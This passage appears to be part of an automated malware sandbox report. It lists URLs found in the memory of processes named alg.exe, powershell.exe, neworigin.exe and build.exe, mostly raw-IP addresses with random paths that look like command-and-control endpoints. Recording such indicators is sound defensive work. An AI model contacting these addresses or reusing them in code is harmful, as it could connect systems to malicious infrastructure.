Source: alg.exe, 00000007.00000003.2426939526.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/eqmwmfvyliwj
Source: alg.exe, 00000007.00000003.2426939526.00000000005EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/eqmwmfvyliwj4lv
Source: alg.exe, 00000007.00000003.2518175958.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/gs
Source: alg.exe, 00000007.00000003.2478183548.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/sG0aw(
Source: alg.exe, 00000007.00000003.2518175958.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/sS0
Source: alg.exe, 00000007.00000003.2368233473.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/vgc
Source: alg.exe, 00000007.00000003.2356395367.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/xvgc
Source: alg.exe, 00000007.00000003.2478183548.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120:80/edhrpwfa
Source: alg.exe, 00000007.00000003.2426939526.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120:80/eqmwmfvyliwj
Source: alg.exe, 00000007.00000003.2368233473.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120:80/xvgc
Source: alg.exe, 00000007.00000003.2530314308.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.23RZ
Source: alg.exe, 00000007.00000003.2338272078.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/
Source: alg.exe, 00000007.00000003.2258038326.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/K0uw
Source: alg.exe, 00000007.00000003.2258965220.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2258038326.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/ardo
Source: alg.exe, 00000007.00000003.2258038326.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/ardo0
Source: alg.exe, 00000007.00000003.2258965220.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/ardoYv
Source: alg.exe, 00000007.00000003.2258965220.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/iphyiya
Source: alg.exe, 00000007.00000003.2258965220.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/iphyiyaings_v
Source: alg.exe, 00000007.00000003.2338170648.00000000005EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/vtneffnnlgu
Source: alg.exe, 00000007.00000003.2338170648.00000000005EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/vtneffnnlguZ
Source: alg.exe, 00000007.00000003.2338170648.00000000005EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/vtneffnnlgugslv
Source: alg.exe, 00000007.00000003.2417407058.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2368233473.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2384400475.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2338272078.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2391388001.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225/vtneffnnlgur
Source: alg.exe, 00000007.00000003.2258038326.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225:80/ardoya
Source: alg.exe, 00000007.00000003.2338272078.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.117.43.225:80/vtneffnnlgua
Source: alg.exe, 00000007.00000003.2529365991.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/
Source: alg.exe, 00000007.00000003.2529365991.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/Fv
Source: alg.exe, 00000007.00000003.2308483180.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/_v
Source: alg.exe, 00000007.00000003.2529365991.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/oyfrpxy
Source: alg.exe, 00000007.00000003.2529365991.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/oyfrpxy01ad4
Source: alg.exe, 00000007.00000003.2308483180.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/ses3
Source: alg.exe, 00000007.00000003.2530314308.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34:80/oyfrpxyrobat
Source: alg.exe, 00000007.00000003.2308483180.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34:80/sesy0
Source: alg.exe, 00000007.00000003.2391388001.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/
Source: alg.exe, 00000007.00000003.2249290424.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/K0uw
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/earflafsrpsf
Source: alg.exe, 00000007.00000003.2250552817.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/jddjajyoe
Source: alg.exe, 00000007.00000003.2250552817.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/jddjajyoeings
Source: alg.exe, 00000007.00000003.2434482436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/oaickrbplfmnmggeZ
Source: alg.exe, 00000007.00000003.2249290424.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/s0
Source: alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138:80/elhpchftdggocnkdP9
Source: alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138:80/jddjajyoe
Source: alg.exe, 00000007.00000003.2434482436.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138:80/oaickrbplfmnmggTiP
Source: alg.exe, 00000007.00000003.2238967896.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/
Source: alg.exe, 00000007.00000003.2660097743.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/nuxquhjmvum
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/nuxquhjmvumd
Source: alg.exe, 00000007.00000003.2238967896.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160:80/asieco
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160:80/nuxquhjmvumP
Source: alg.exe, 00000007.00000003.2302197410.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200/yqpffwpvinojygwj
Source: alg.exe, 00000007.00000003.2302197410.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2308483180.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://35.164.78.200:80/yqpffwpvinojygwjP
Source: alg.exe, 00000007.00000003.2186311885.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2179861854.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/
Source: alg.exe, 00000007.00000003.2186311885.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2179861854.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1
Source: alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/3
Source: alg.exe, 00000007.00000003.2398305512.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2416717256.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/lkvjqbtwklkptpvq
Source: alg.exe, 00000007.00000003.2399070234.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/lkvkqbtwklkptpvqVrGw
Source: alg.exe, 00000007.00000003.2179861854.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/lnavxpry
Source: alg.exe, 00000007.00000003.2179861854.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/lnavxpryrl
Source: alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/ngs
Source: alg.exe, 00000007.00000003.2186311885.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/yix
Source: alg.exe, 00000007.00000003.2280774481.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/yqmsdjuyey
Source: alg.exe, 00000007.00000003.2186311885.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/yyix
Source: alg.exe, 00000007.00000003.2186311885.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/yyixK
Source: alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/yyvfretnbpwpuxhl
Source: alg.exe, 00000007.00000003.2179861854.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/lnavxpry
Source: alg.exe, 00000007.00000003.2280774481.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/yqmsdjuyey
Source: alg.exe, 00000007.00000003.2186311885.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/yyixpry
Source: alg.exe, 00000007.00000003.1972176897.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1971543237.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/yyvfretnbpwpuxhl
Source: alg.exe, 00000007.00000003.2155129911.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/
Source: alg.exe, 00000007.00000003.2155129911.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/1
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/bbjmfesvmurxh
Source: alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2155129911.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/ikqjeeswprlgw
Source: alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/ikqjeeswprlgw4
Source: alg.exe, 00000007.00000003.2493652787.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/nmcegkesku
Source: alg.exe, 00000007.00000003.2493652787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/nmcegkeskutv
Source: alg.exe, 00000007.00000003.2493652787.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/s
Source: alg.exe, 00000007.00000003.2155129911.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/s0
Source: alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2179861854.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2186311885.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212:80/ikqjeeswprlgw
Source: alg.exe, 00000007.00000003.2509390844.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212:80/nmcegkesku
Source: alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1922819020.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000007.00000003.2291591622.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/Y
Source: alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/crsx
Source: alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/crsxgudqu
Source: alg.exe, 00000007.00000003.1918843183.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1922819020.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/cxhmgtreorgudqu
Source: alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/gs
Source: alg.exe, 00000007.00000003.2329626302.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/li
Source: alg.exe, 00000007.00000003.2329626302.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/li368302a1ad4
Source: alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/rsx
Source: alg.exe, 00000007.00000003.2291591622.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/s0
Source: alg.exe, 00000007.00000003.2329626302.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/sc0
Source: alg.exe, 00000007.00000003.2368233473.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tbbwyfgx
Source: alg.exe, 00000007.00000003.2291591622.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/y
Source: alg.exe, 00000007.00000003.2291591622.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/yH%
Source: alg.exe, 00000007.00000003.2329626302.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/li0
Source: alg.exe, 00000007.00000003.2368233473.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/tbbwyfgxP8C
Source: alg.exe, 00000007.00000003.2302197410.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2291591622.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/y0
Source: alg.exe, 00000007.00000003.2186311885.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2060275574.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2678116893.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2155129911.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991140646.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228650616.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2417407058.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2319948901.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2368233473.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2291591622.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2014386335.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2274221241.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2384400475.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2258038326.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/qbfrwab
Source: alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228130835.00000000005FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/tlrsmavbccvnwuep
Source: alg.exe, 00000007.00000003.1999497913.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998500791.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/f
Source: alg.exe, 00000007.00000003.1999497913.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998500791.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991140646.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/qbfrwabnbpwpuxhl
Source: alg.exe, 00000007.00000003.2238967896.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/tlrsmavbccvnwuep
Source: alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/yq
Source: alg.exe, 00000007.00000003.2060275574.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2100203813.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000007.00000003.2100203813.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/70
Source: alg.exe, 00000007.00000003.2100203813.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/C0mw)
Source: alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2060275574.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/ea
Source: alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/eaa
Source: alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/elhlcfwgsepqd
Source: alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/elhlcfwgsepqdUv
Source: alg.exe, 00000007.00000003.2100203813.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2100203813.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/jbavyixtd
Source: alg.exe, 00000007.00000003.2140490460.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kjfhq
Source: alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/ea
Source: alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/elhlcfwgsepqd
Source: alg.exe, 00000007.00000003.2140490460.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2100203813.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/jbavyixtd
Source: alg.exe, 00000007.00000003.2140490460.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2207970230.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2179861854.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2186311885.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/kjfhq
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.214.228.140/pffrbkpnttaxats
Source: powershell.exe, 00000012.00000002.1968685115.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m;S
Source: powershell.exe, 00000012.00000002.1992734862.000000000707E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000D.00000002.3160951501.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179726785.00000000065B0000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.0000000009993000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.000000000307E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179935090.00000000065FC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.000000000999A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.3160951501.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179726785.00000000065B0000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.0000000009993000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.000000000307E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179935090.00000000065FC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.000000000999A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000D.00000002.3160951501.0000000003096000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.000000000307E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
